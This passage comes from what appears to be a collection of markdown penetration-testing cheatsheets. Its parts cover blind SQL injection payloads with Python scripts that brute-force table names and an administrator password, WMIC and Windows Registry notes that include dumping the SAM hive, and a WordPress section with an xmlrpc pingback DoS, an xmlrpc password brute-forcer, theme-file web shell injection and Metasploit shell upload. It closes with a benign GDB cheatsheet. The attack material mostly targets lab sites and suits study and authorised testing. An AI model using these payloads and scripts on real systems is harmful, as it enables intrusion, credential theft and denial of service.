UNION SELECT NULL,CONCAT(column1,'|',column2),NULL from table_name -- - 162 | ``` 163 | 164 | --- 165 | 166 | ## Blind SQL Injection 167 | 168 | Sometimes we dont get error or any data in the response but still website can be vulnerable to sql injection . 169 | Example : in the cookie 170 | we can try to inject some statements in cookie 171 | 172 | ### Conditional Responses 173 | 174 | we will inject FALSE condition then server sends normal response . 175 | then we will inject TRUE condition then server sends different or lightly different response 176 | that means we can inject sql queries there 177 | 178 | **FALSE Condition** - default length of response 179 | ``` 180 | Cookie : TrackingID = abcdef' AND '1'='2 181 | ``` 182 | 183 | **TRUE Condition** 184 | ``` 185 | Cookie : TrackingID = abcdef' AND '1'='1 186 | ``` 187 | 188 | If we get response length > default length 189 | then its vulnerable to blind sqli 190 | 191 | Verifying which database 192 | ``` 193 | Cookie : TrackingID = abcdef' AND (SELECT 'a' from dual LIMIT 1)='a 194 | Cookie : TrackingID = abcdef' AND (SELECT 'a' from information_schema.tables LIMIT 1)='a 195 | ``` 196 | 197 | in blind sqli , we need to perform maximum bruteforcing 198 | 199 | Bruteforcing tablenames 200 | ``` 201 | Cookie : TrackingID = abcdef' AND (SELECT 'a' from information_schema.columns where table_name='$users$' LIMIT 1)='a 202 | ``` 203 | send this to intruder and bruteforce the table names 204 | 205 | ```python 206 | import requests 207 | 208 | tables = ['users','login','hashes'] 209 | cookie = 'abcdef' 210 | r = requests.get(url) 211 | default_length = len(r.text) 212 | for i in tables: 213 | final_cookie = cookie + "' AND (SELECT 'a' from information_schema.columns where table_name='{}' LIMIT 1)='a".format(i) 214 | full_cookie = {"TrackingId":final_cookie} 215 | temp = requests.get(url,cookies=full_cookie) 216 | if len(temp.text)>default_length: 217 | print("{} table exists".format(i)) 218 | ``` 219 | 220 | Bruteforcing Column names 221 | 222 | ``` 223 | Cookie : TrackingID = abcdef' AND (SELECT SUBSTRING(CONCAT('a',$column_name$),1,1)='a' from users LIMIT 1)='a 224 | ``` 225 | 226 | Determining Maximum of length of that column 227 | 228 | we can use 229 | ``` 230 | MAX(LENGTH(column_name)) 231 | ``` 232 | 233 | Bruteforce the number to determine the maximum 234 | ``` 235 | Cookie : TrackingID = abcdef' AND (SELECT MAX(LENGTH(password)) from users)='$1$ 236 | ``` 237 | 238 | Bruteforcing data in columns 239 | Let's assume there is password column in users table 240 | 241 | ``` 242 | Cookie : TrackingID = abcdef' AND (SELECT SUBSTRING(password,$1$,1)='$a$' from users LIMIT 1)='a 243 | ``` 244 | 245 | ```python 246 | import requests 247 | letters \= \['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',\\ 248 | '1','2','3','4','5','6','7','8','9','0'\] 249 | 250 | url \= 'https://ac7f1faa1f7fa42d8008166d004a000a.web-security-academy.net/filter?category=Gifts' 251 | cookie \= 'vQiTsU5UJcK5E5a2' 252 | 253 | password \= '' 254 | 255 | for i in range(1,21): 256 | for j in letters: 257 | final\_cookie \= cookie +"'%3B(select CASE when SUBSTRING(password,{},1)='{}' THEN pg\_sleep(4) else '' end from users where username='administrator')-- -".format(i,j) 258 | full\_cookie \= {"TrackingId":final\_cookie} 259 | print("Trying {} position with {}".format(i,j)) 260 | temp \= requests.get(url,cookies\=full\_cookie) 261 | if temp.elapsed.total\_seconds()\>3: 262 | password += j 263 | print(password) 264 | break 265 | 266 | print(password) 267 | 268 | ``` 269 | 270 | --- 271 | 272 | ### Conditional Errors 273 | 274 | Sometimes there will be no difference in responses from TRUE and FALSE conditions 275 | then we need to trigger an exception and db cant hanle then we get 500 server error indicating our sql query is correct 276 | 277 | SELECT CASE 278 | ``` 279 | select case when (condition) then condition2 else condition3 end 280 | ``` 281 | 282 | ``` 283 | SELECT CASE WHEN (1=1) THEN 1/0 ELSE '' END from table 284 | ``` 285 | 286 | ``` 287 | ORACLE - TO_CHAR(1/0) 288 | PostgreSQL - cast(1/0 as text) 289 | MySQL - IF(condition,true-condition,else-condition) 290 | ``` 291 | 292 | Example : 293 | ``` 294 | Cookie : TrackingID = abcdef'+(SELECT '' from information_schema.tables LIMIT 1)+' 295 | 296 | Cookie : TrackingID = abcdef'||(SELECT '' from dual)||' 297 | 298 | ``` 299 | 300 | Bruteforcing tables 301 | ``` 302 | Cookie : TrackingID = abcdef'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END from $table_name$)||' 303 | ``` 304 | 305 | Bruteforcing columns 306 | ``` 307 | Cookie : TrackingID = abcdef'||(SELECT CASE WHEN(MAX(LENGTH($username$))>0) THEN TO_CHAR(1/0) ELSE '' END from users)||' 308 | ``` 309 | 310 | Bruteforcing data in columns 311 | Example : usernames 312 | ``` 313 | Cookie : TrackingID = abcdef'||(SELECT CASE WHEN (MAX(LENGTH(username))>0) THEN TO_CHAR(1/0) ELSE '' END from users where username='$administrator$' )||' 314 | ``` 315 | 316 | Bruteforcing data (passwords) 317 | ``` 318 | Cookie : TrackingID = abcdef'||(SELECT CASE WHEN (SUBSTR(password,1,1)='$a$') THEN TO_CHAR(1/0) ELSE '' END from users where username='administrator')||' 319 | ``` 320 | if we got error that means our condition is true 321 | 322 | --- 323 | 324 | ### Time Delays 325 | 326 | upto now we got errors but what if exceptions are handled correctly ? , in this case we tell db to sleep for few seconds if condition is true 327 | we should see some delay in response 328 | 329 | Different time delay techniques for different databases 330 | ``` 331 | ORACLE - dbms_pipe.recieve_message(('a'),5) 332 | PostgreSQL - pg_sleep(5) 333 | Microsoft - WAITFOR DELAY '0:0:5' 334 | MySQL - sleep(5) 335 | ``` 336 | 337 | Checking the type of database 338 | ``` 339 | Cookie : TrackingID = abcdef';(SELECT '' from information_schema.tables LIMIT 1)-- - 340 | 341 | Cookie : TrackingID = abcdef'%3B(sleep(5))-- - 342 | 343 | Cookie : TrackingID = abcdef'%3B(pg_sleep(5))-- - 344 | ``` 345 | 346 | Bruteforcing tables 347 | ``` 348 | Cookie : TrackingID = abcdef'%3B(SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE '' from $table_name$) -- - 349 | ``` 350 | 351 | Bruteforcing columns 352 | ``` 353 | Cookie : TrackingID = abcdef'%3B(SELECT CASE WHEN SUBSTRING(CONCAT('a',$username$),1,1)='a' THEN pg_sleep(5) ELSE '' from table_name) -- - 354 | ``` 355 | 356 | Bruteforcing data 357 | ``` 358 | Cookie : TrackingID = abcdef'%3B(SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE '' from table_name where username='$administrator$') -- - 359 | 360 | Cookie : TrackingID = abcdef'%3B(SELECT CASE WHEN SUBSTRING(password,1,1)='$a$' THEN pg_sleep(5) ELSE '' from users where username='administrator') -- - 361 | 362 | ``` 363 | 364 | Python code to test the response delay 365 | ```python 366 | import requests 367 | r = requests.get(url) 368 | print(r.elapsed.total_seconds()) 369 | ``` 370 | -------------------------------------------------------------------------------- /WMIC Cheatsheet.md: -------------------------------------------------------------------------------- 1 | # WMI Console 2 | 3 | Tags : #wmic 4 | 5 | 6 | WMI is windows management interface . Its used to retrieve information of windows computers in local network 7 | 8 | WMIC is console edition of WMI that uses command line , there are powershell and also programming language support for these wmi 9 | 10 | type wmic /? to get all options available for wmi 11 | ``` 12 | wmic /? 13 | ``` 14 | 15 | --- 16 | 17 | ## To know about BIOS information 18 | 19 | ``` 20 | wmic bios 21 | ``` 22 | 23 | if you want to truncate output or want only brief information you can use `list brief` 24 | ``` 25 | wmic bios list brief 26 | ``` 27 | 28 | if we want to query the remote computer 29 | we need to specify /node switch and /user and /password 30 | ``` 31 | wmic /node:10.2.2.3 /user:arrow /password:arrowverse bios list brief 32 | ``` 33 | 34 | you can select particular columns also 35 | ``` 36 | wmic bios get manufacturer,name 37 | ``` 38 | 39 | you can get all available switches for particular class using /? 40 | ``` 41 | wmic bios /? 42 | wmic bios get /? 43 | ``` 44 | 45 | --- 46 | 47 | ## Knowing about computersystem 48 | 49 | ``` 50 | wmic cpu list brief 51 | ``` 52 | 53 | to know about manufacturer , model name ,desktop name etc 54 | ``` 55 | wmic computersystem 56 | wmic computersystem list brief 57 | ``` 58 | 59 | to know about users of the computer 60 | ``` 61 | wmic desktop get name 62 | ``` 63 | 64 | 65 | ## Knowing about disk drives and partitions 66 | 67 | lets view all physical harddrives connected 68 | ``` 69 | wmic diskdrive list brief 70 | wmic diskdrive get partitions 71 | ``` 72 | 73 | now we can see partitions , lets get those information too 74 | ``` 75 | wmic partition list brief 76 | ``` 77 | 78 | this command gives much more information 79 | ``` 80 | wmic partition get name,size,index,type,bootable,primarypartition 81 | ``` 82 | 83 | 84 | ## Knowing Environment variables 85 | 86 | wmic environment gives all the variables and paths 87 | ``` 88 | wmic environment list brief 89 | ``` 90 | 91 | you can see mappings of **TEMP,Path** 92 | 93 | 94 | ## Knowing Groups and users information 95 | 96 | lets get users information 97 | ``` 98 | wmic useraccount list brief 99 | ``` 100 | 101 | and groups information 102 | ``` 103 | wmic group list brief 104 | ``` 105 | 106 | 107 | ## Knowing about operating system 108 | 109 | ``` 110 | wmic os 111 | wmic os list brief 112 | ``` 113 | 114 | this command gives useful information 115 | ``` 116 | wmic os get buildnumber,buildtype,csname,countrycode,currenttimezone,lastbootuptime,manufacturer,name,numberofusers,ostype,serialnumber,version /format:list 117 | ``` 118 | 119 | 120 | 121 | -------------------------------------------------------------------------------- /Windows Registry.md: -------------------------------------------------------------------------------- 1 | # Windows Registry 2 | 3 | Tags : #regedit 4 | 5 | 6 | Registry is hierarchial database that stores configuration and settings of OS , Users , Hardware, Software , Networking etc 7 | 8 | Registry is stored on harddisk called **Hives** 9 | Whenever we boot our pc , all these Hives are loaded into memory and thus all the settings like wallpaper , appearance , networking etc are automatically loaded 10 | 11 | Registry contains **keys** and **values** 12 | these keys can contain multiple subkeys 13 | 14 | There are main 5 Hives in Registry 15 | 16 | **HKEY_CLASSES_ROOT** (HKCR) 17 | **HKEY_CURRENT_USER** (HKCU) 18 | **HKEY_LOCAL_MACHINE** (HKLM) 19 | **HKEY_USERS** (HKU) 20 | **HKEY_CURRENT_CONFIG** (HKCC) 21 | 22 | --- 23 | 24 | ## Hives 25 | 26 | Lets see each one of them 27 | 28 | ## HKEY_CLASSES_ROOT 29 | 30 | This Hive contains all core components of OS 31 | like drag-drop , copy operations , shortcuts etc 32 | It also contain information like **Open with** 33 | like when u open a file with a psd extension it automatically opens with photoshop 34 | that information will be stored in this hive 35 | 36 | ## HKEY_CURRENT_USER 37 | 38 | This hive contains keys related to currently loggedin user 39 | like user's wallpaper , colors , cursor and all other settings 40 | It also contains ControlPanel and software installed on User's Desktop 41 | 42 | The structure is as follows 43 | 44 | ![[Pasted image 20210705085515.png]] 45 | 46 | HKCU is just link to HKU 47 | if you open HKEY_USERS there you can see exact structure under your current user's SID 48 | 49 | The current user's registry configuration is stored in harddisk at the path 50 | 51 | ``` 52 | C:\Users\username\NTUSER.DAT 53 | ``` 54 | 55 | 56 | ## HKEY_LOCAL_MACHINE 57 | 58 | This hive contains all information about softwares installed , hardware , bios , security , password hashes etc 59 | 60 | The structure is as follows 61 | 62 | ![[Pasted image 20210705085559.png]] 63 | 64 | these SAM , SECURITY , SYSTEM , BCD are stored in 65 | ``` 66 | C:\Windows\System32\Config 67 | ``` 68 | 69 | SAM and SECURITY are hidden even from **administrator** user 70 | they are accessible only by **SYSTEM** user 71 | 72 | Download psexec from microsoft sysinternals suite 73 | Run cmd as administrator 74 | Now navigate to that psexec folder and execute 75 | ``` 76 | >psexec.exe -sid cmd.exe 77 | ``` 78 | 79 | a new command prompt will open with SYSTEM privileges 80 | in that type 81 | ``` 82 | > regedit.exe 83 | ``` 84 | close any opened regedit 85 | 86 | now you will have access to SAM and SECURITY 87 | 88 | if we have administrator access we can dump SAM SYSTEM and SECURITY 89 | 90 | ``` 91 | reg save hklm\sam e:\sam 92 | ``` 93 | 94 | ## HKEY_USERS 95 | 96 | This hive contain all users' information 97 | in this keys contain SID (security identifer) 98 | of users 99 | 100 | ![[Pasted image 20210705121710.png]] 101 | 102 | first three are inbuilt accounts used by services like IIS , Kerberos etc 103 | 104 | remaining lengthy ones are actual users 105 | it doesnot show all users but only active users 106 | 107 | to know our own sid 108 | ``` 109 | whoami /all 110 | ``` 111 | 112 | 113 | ## HKEY_CURRENT_CONFIG 114 | 115 | this acts as shortcut to 116 | ``` 117 | Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Hardware Profiles\Current 118 | ``` 119 | 120 | it stores hardware information like printers , etc 121 | 122 | --- 123 | 124 | ## Data Types 125 | 126 | **REG_SZ** : this data type stores common ascii characters 127 | 128 | **REG_BINARY** : this data type stores data in the form of 0's and 1's but regedit shows us in hex format for our convenience 129 | 130 | **REG_DWORD** : this data type stores data in the form of 4 bytes (2 words) that means 32 bits. 131 | Generally it is used to store boolean values 132 | 133 | **REG_EXPAND_SZ** : this data type stores string like a file path . when parsed by application it parses it as file path 134 | 135 | **REG_MULTI_SZ** : this stores multiple strings as one string . Each string is separated by NULL byte \x00 136 | 137 | -------------------------------------------------------------------------------- /Wordpress Cheatsheet.md: -------------------------------------------------------------------------------- 1 | # Wordpress Cheatsheet 2 | 3 | Tags : #wordpress #wpscan #xmlrpc #systemlistmethods #wpgetusersblogs #metasploit #xmlrpcdos #themeinjection #plugininjection #wp-json #wp-admin #wp-content #wp-includes 4 | 5 | A CMS is made up of two key components: 6 | 7 | - A Content Management Application (CMA) - the interface used to add and manage content. 8 | - A Content Delivery Application (CDA) - the backend that takes the input entered into the CMA and assembles the code into a working, visually appealing website 9 | 10 | wordpress is CMS that means you can do little coding or no coding at all still u can build full fledged website including databases 11 | 12 | --- 13 | 14 | ## wordpress structure 15 | 16 | ├── index.php 17 | ├── license.txt 18 | ├── readme.html 19 | ├── wp-activate.php 20 | ├── wp-admin 21 | ├── wp-blog-header.php 22 | ├── wp-comments-post.php 23 | ├── wp-config.php 24 | ├── wp-config-sample.php 25 | ├── wp-content 26 | ├── wp-cron.php 27 | ├── wp-includes 28 | ├── wp-links-opml.php 29 | ├── wp-load.php 30 | ├── wp-login.php 31 | ├── wp-mail.php 32 | ├── wp-settings.php 33 | ├── wp-signup.php 34 | ├── wp-trackback.php 35 | └── xmlrpc.php 36 | 37 | --- 38 | 39 | ## Login page 40 | 41 | /wp-admin usually contains login page but it can be changed 42 | 43 | ``` 44 | /wp-admin/login.php 45 | /wp-admin/wp-login.php 46 | /login.php 47 | /wp-login.php 48 | ``` 49 | 50 | --- 51 | 52 | ## Enumerate Users Manually 53 | 54 | first manually review posts posted by users and there you can see who posted the post 55 | 56 | another method is get request to /wp-json/wp/v2/users 57 | 58 | ``` 59 | curl -X GET http://wordpresssite/wp-json/wp/v2/users 60 | ``` 61 | 62 | --- 63 | 64 | ## XMLRPC Attacks 65 | 66 | if wordpress have xmlrpc.php in the root directory we can execute rpc calls and can do ddos and bruteforce authentication 67 | 68 | construct a post request to /xmlrpc.php 69 | send this as data 70 | ``` 71 | 72 | 73 | system.listMethods 74 | 75 | 76 | 77 | 78 | 79 | 80 | ``` 81 | 82 | if you see all the methods in the response it means u can call those methods 83 | else stop here and dont try to call any method its waste of time 84 | 85 | one method is **pingback.ping** 86 | this can be used to dos the machine 87 | ``` 88 | import requests 89 | url = "http://127.0.0.1:8080/wordpress/xmlrpc.php" 90 | xmldata = """ 91 | 92 | 93 | pingback.ping 94 | 95 | 96 | https://webhook.site/1b815e97-9911-484a-8ee8-0e75c608fea9/ 97 | 98 | 99 | http://127.0.0.1:8080/wordpress/ 100 | 101 | 102 | 103 | """ 104 | r = requests.post(url,data=xmldata) 105 | print(r.text) 106 | ``` 107 | 108 | first string is webhook , create a temporary one on online,second parameter is some random blog 109 | 110 | Now we bruteforce username and password 111 | we can also use **wp-admin** page but there may be limit to number of attempts 112 | so in that case we can use xmlrpc.php 113 | it doesnot have any limit 114 | 115 | ```python 116 | import requests 117 | url = "http://127.0.0.1:8080/wordpress/xmlrpc.php" 118 | passwords = ['tech69','admin'] 119 | for i in range(0,len(passwords)): 120 | xmldata = """ 121 | 122 | 123 | wp.getUsersBlogs 124 | 125 | 126 | admin 127 | 128 | 129 | {} 130 | 131 | 132 | 133 | """.format(passwords[i]) 134 | r = requests.post(url,data=xmldata) 135 | #print(r.text) 136 | if not "Incorrect" in r.text: 137 | print("username:password is admin:{}".format(passwords[i])) 138 | ``` 139 | 140 | correct response will be like this 141 | ``` 142 | E:\python>python wordpress-xmlrpc.py 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | isAdmin1 151 | urlhttp://127.0.0.1:8080/wordpress/ 152 | blogid1 153 | blogNameTech69 154 | xmlrpchttp://127.0.0.1:8080/wordpress/xmlrpc.php 155 | 156 | 157 | 158 | 159 | 160 | 161 | ``` 162 | 163 | the above python code will give u password 164 | tweak passwords from a file given and usernames also 165 | 166 | --- 167 | 168 | ## WPScan 169 | 170 | **wpscan** enumerates wordpress themes , plugins , users , backups etc 171 | 172 | basic syntax 173 | p - plugins 174 | t - themes 175 | u - users 176 | ``` 177 | wpscan --url http://192.168.0.102:8080/wordpress/ --enumerate p,t,u 178 | ``` 179 | 180 | we can also enumerate all plugins , all themes and for all users 181 | 182 | ``` 183 | wpscan --url http://192.168.0.102:8080/wordpress/ --enumerate ap,at,u 184 | ``` 185 | 186 | During the scan wpscan identifies vulnerabilities in the found themes/plugins 187 | it shows us the result if it have sqli or lfi or any other vulnerability 188 | 189 | we can also bruteforce users and passwords using wpscan with xmlrpc 190 | 191 | ``` 192 | wpscan --password-attack xmlrpc -U roger -P /rockyou.txt -t 25 --url http://138.68.141.81:31695 193 | ``` 194 | 195 | we get output if the password matches from rockyou.txt 196 | ``` 197 | [!] Valid Combinations Found: 198 | | Username: roger, Password: lizard 199 | ``` 200 | 201 | if bruteforcing for one user didnot work , try for another user even though that user is not admin 202 | 203 | --- 204 | 205 | ## Theme/Plugin Injection 206 | 207 | now we have access to wordpress dashboard 208 | choose any theme 209 | and choose any php file like **404.php** or something which no one likely to use 210 | 211 | now inject this php code 212 | ```php 213 | 214 | ``` 215 | 216 | click on update 217 | if cms did give any errors like changes were reverted upload via sftp then edit another theme 218 | 219 | now go to that php file in url 220 | 221 | ``` 222 | http://192.168.0.102:8080/wordpress/wp-content/themes/twentysixteen/404.php?cmd=id 223 | ``` 224 | 225 | now put any reverse shell at **id** and get shells 226 | 227 | --- 228 | 229 | ## Metasploit 230 | 231 | metasploit has modules for xmlrpc and wordpress 232 | 233 | ``` 234 | search wordpress xmlrpc 235 | ``` 236 | 237 | ``` 238 | Matching Modules 239 | ================ 240 | 241 | # Name Disclosure Date Rank Check Description 242 | - ---- --------------- ---- ----- ----------- 243 | 0 auxiliary/dos/http/wordpress_xmlrpc_dos 2014-08-06 normal No Wordpress XMLRPC DoS 244 | 1 auxiliary/scanner/http/wordpress_ghost_scanner normal No WordPress XMLRPC GHOST Vulnerability Scanner 245 | 2 auxiliary/scanner/http/wordpress_multicall_creds normal No Wordpress XML-RPC system.multicall Credential Collector 246 | 3 auxiliary/scanner/http/wordpress_xmlrpc_login normal No Wordpress XML-RPC Username/Password Login Scanner 247 | 4 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution 248 | ``` 249 | 250 | lets try for bruteforcing login 251 | 252 | ``` 253 | msf6 auxiliary(scanner/http/wordpress_xmlrpc_login) > set RHOSTS 192.168.0.102 254 | RHOSTS => 192.168.0.102 255 | msf6 auxiliary(scanner/http/wordpress_xmlrpc_login) > set TARGETURI /wordpress 256 | TARGETURI => /wordpress 257 | msf6 auxiliary(scanner/http/wordpress_xmlrpc_login) > set STOP_ON_SUCCESS true 258 | STOP_ON_SUCCESS => true 259 | msf6 auxiliary(scanner/http/wordpress_xmlrpc_login) > set USERNAME admin 260 | USERNAME => admin 261 | msf6 auxiliary(scanner/http/wordpress_xmlrpc_login) > set PASS_FILE /home/kali/tools/wordlists/rockyou.txt 262 | PASS_FILE => /home/kali/tools/wordlists/rockyou.txt 263 | msf6 auxiliary(scanner/http/wordpress_xmlrpc_login) > set RPORT 8080 264 | RPORT => 8080 265 | msf6 auxiliary(scanner/http/wordpress_xmlrpc_login) > show options 266 | ``` 267 | 268 | run the module 269 | 270 | after getting the correct password we can upload shell using this module **exploit/unix/webapp/wp_admin_shell_upload** 271 | 272 | ``` 273 | msf6 exploit(unix/webapp/wp_admin_shell_upload) > setg RHOSTS 192.168.0.102 274 | RHOSTS => 192.168.0.102 275 | msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RPORT 8080 276 | RPORT => 8080 277 | msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress 278 | TARGETURI => /wordpress 279 | msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin 280 | USERNAME => admin 281 | msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD admin 282 | PASSWORD => admin 283 | 284 | run 285 | ``` 286 | 287 | now you get the reverse shell 288 | 289 | 290 | -------------------------------------------------------------------------------- /cheatsheet_gdb.md: -------------------------------------------------------------------------------- 1 | 2 | # GDB Cheatsheet 3 | 4 | # Preserves Debug Symbols 5 | 6 | ``` 7 | gcc -ggdb filename.c 8 | ``` 9 | 10 | # Loading Binary into gdb 11 | 12 | ``` 13 | gdb binary_file 14 | ``` 15 | 16 | ## or 17 | 18 | ``` 19 | (gdb) file binary_file 20 | ``` 21 | 22 | 23 | # List Source Code 24 | 25 | ``` 26 | (gdb) list 27 | ``` 28 | ## or list from particular line or func 29 | 30 | ``` 31 | list 10 32 | ``` 33 | 34 | # Running Binary in GDB 35 | 36 | ``` 37 | (gdb) run 38 | ``` 39 | 40 | ## with arguments 41 | 42 | ``` 43 | (gdb) run arg1 arg2 arg3 44 | ``` 45 | 46 | # Help 47 | 48 | ``` 49 | (gdb) help 50 | ``` 51 | 52 | 53 | 54 | # Extracting Symbol Table 55 | 56 | ``` 57 | objcopy --only-keep-debug binary_with_debugsymbols debug_symbols 58 | ``` 59 | 60 | 61 | # Removing Symbol Table 62 | 63 | ``` 64 | strip --strip-debug binary_file 65 | ``` 66 | ## and to strip everything 67 | 68 | ``` 69 | strip --strip-debug --strip-unneeded binary_file 70 | ``` 71 | 72 | # Reading Symbol Table 73 | 74 | ## inside gdb 75 | 76 | ``` 77 | (gdb) symbol-file debug_symbols 78 | ``` 79 | 80 | ## from commandline 81 | 82 | ``` 83 | objcopy --add-gnu-debuglink=debug_symbols 84 | ``` 85 | 86 | # Change syntax 87 | 88 | ## setting to intel 89 | ``` 90 | (gdb) set disassembly-flavor intel 91 | ``` 92 | ## setting to at&t 93 | 94 | ``` 95 | (gdb) set disassembly-flavor att 96 | ``` 97 | 98 | 99 | # List Symbol Table from Binary 100 | 101 | ``` 102 | nm binary_file 103 | ``` 104 | 105 | # Tracing System and Library Calls 106 | 107 | ``` 108 | strace binary_file 109 | strace -e read,write binary_file 110 | 111 | ltrace binary_file 112 | ``` 113 | 114 | # Set Breakpoint 115 | 116 | ``` 117 | (gdb) break line_number 118 | (gdb) break function_name 119 | (gdb) break *address 120 | ``` 121 | 122 | # Delete Breakpoint 123 | 124 | ``` 125 | (gdb) delete breakpoint_number 126 | ``` 127 | 128 | # Getting info 129 | 130 | ``` 131 | (gdb) info functions 132 | (gdb) info variables 133 | (gdb) info breakpoints 134 | (gdb) info registers 135 | (gdb) info scope function_name #lists variables in that function 136 | ``` 137 | 138 | # Print values 139 | 140 | ``` 141 | (gdb) print a 142 | (gdb) print /x $eax 143 | ``` 144 | 145 | # Examine 146 | 147 | ## syntax 148 | ``` 149 | (gdb) x/format address 150 | ``` 151 | 152 | ## more detailly 153 | 154 | ``` 155 | (gdb) x/number_of,representation,size address 156 | ``` 157 | 158 | ## display 5 bytes in hexadecimal 159 | 160 | ``` 161 | (gdb) x/5xb address 162 | ``` 163 | 164 | ## display 1 word in floating point 165 | 166 | ``` 167 | (gdb) x/1fw address 168 | ``` 169 | 170 | 171 | ## display 2 bytes in characters of variable a 172 | 173 | ``` 174 | (gdb) x/2cb &a 175 | ``` 176 | 177 | ## display 10 instructions after address 178 | 179 | ``` 180 | (gdb) x/10i address 181 | ``` 182 | 183 | ## display the string 184 | 185 | ``` 186 | (gdb) x/s argv[0] 187 | ``` 188 | 189 | # Disassemble functions 190 | 191 | ``` 192 | (gdb) disassemble function_name 193 | ``` 194 | 195 | # Step through the program 196 | 197 | 198 | ## step through program but dont go inside functions 199 | 200 | ``` 201 | (gdb) step 202 | ``` 203 | 204 | ## step through each instruction , go inside function 205 | 206 | ``` 207 | (gdb) stepi 208 | ``` 209 | 210 | ## step 5 instructions exactly 211 | 212 | ``` 213 | (gdb) step 5 214 | ``` 215 | 216 | ## step at machine instructions level 217 | 218 | ``` 219 | (gdb) next 220 | ``` 221 | 222 | ## step through functions at machine instructions level 223 | 224 | ``` 225 | (gdb) nexti 226 | ``` 227 | 228 | # Setting values 229 | 230 | ## set variable or register 231 | 232 | ``` 233 | (gdb) set $eip = address 234 | ``` 235 | 236 | ``` 237 | (gdb) set $eax = value 238 | ``` 239 | 240 | ## setting values in address 241 | 242 | ``` 243 | (gdb) set {data_type} address = value 244 | (gdb) set {int} 0x12345678 = 9 245 | ``` 246 | 247 | # Call a function 248 | 249 | ``` 250 | (gdb) call function_name 251 | ``` 252 | 253 | # Continue the Program 254 | 255 | ``` 256 | 257 | (gdb) continue 258 | ``` 259 | 260 | # GDB Hooks 261 | 262 | ## hooks are user defined commands , when there is command 'temp' , whenever the command is executed , if there is any hook named 'hook-temp' then commands in that hook will gets executed 263 | 264 | ## let's say if my program stops then some commands should execute 265 | 266 | ## show registers automatically when program stops 267 | 268 | ``` 269 | (gdb) define hook-stop 270 | > info registers 271 | > x/8cb $esp 272 | > end 273 | ``` 274 | 275 | 276 | 277 | # Continue only the Function 278 | 279 | ``` 280 | (gdb) fin 281 | ``` 282 | 283 | 284 | # Quit the gdb 285 | 286 | ``` 287 | (gdb) quit 288 | ``` 289 | 290 | # Installing PEDA Plugin 291 | 292 | ## peda plugin is like automated hook that displays registers , stack and instructions 293 | 294 | ``` 295 | git clone https://github.com/longld/peda.git ~/peda 296 | echo "source ~/peda/peda.py" >> ~/.gdbinit 297 | ``` 298 | 299 | ## for other peda commands check out its github 300 | 301 | [check here](https://github.com/longld/peda) 302 | 303 | 304 | --------------------------------------------------------------------------------